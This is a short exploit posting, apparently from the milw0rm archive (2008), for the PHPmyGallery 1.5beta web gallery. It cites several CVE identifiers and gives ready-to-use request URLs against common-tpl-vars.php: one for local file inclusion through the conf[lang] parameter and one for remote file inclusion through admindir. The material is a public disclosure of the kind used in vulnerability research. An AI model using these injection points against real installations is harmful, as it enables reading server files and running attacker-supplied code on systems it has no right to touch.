PHPmyGallery 1.5beta - '/common-tpl-vars.php' Local/Remote File Inclusion

EKU-ID: 15247	CVE: OSVDB-52751;CVE-2008-6318;OSVDB-52333;CVE-2008-6317;CVE-2008-6316	OSVDB-ID:
Author: CoBRa_21	Published: 2008-12-09	Verified:
Download:

Rating

☆☆☆☆☆

*****************************************************************************************

Phpmygallery-1.5beta (common-tpl-vars.php) Multiple Local File Inclusion Vulnerabilities

*****************************************************************************************

Script Name: Phpmygallery

Version: 1.5beta

Autor: CoBRa_21

My Site: www.ipbul.org

Download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.5beta.zip

*****************************************************************************************

Exploit:

http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?conf[lang]= [LFÄ°] (Windows Only)
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?admindir=[RFI]

*****************************************************************************************

Not: TÃ¼m Ä°slam Aleminin Kurban BayramÄ± Mobarek Olsun

*****************************************************************************************

# milw0rm.com [2008-12-09]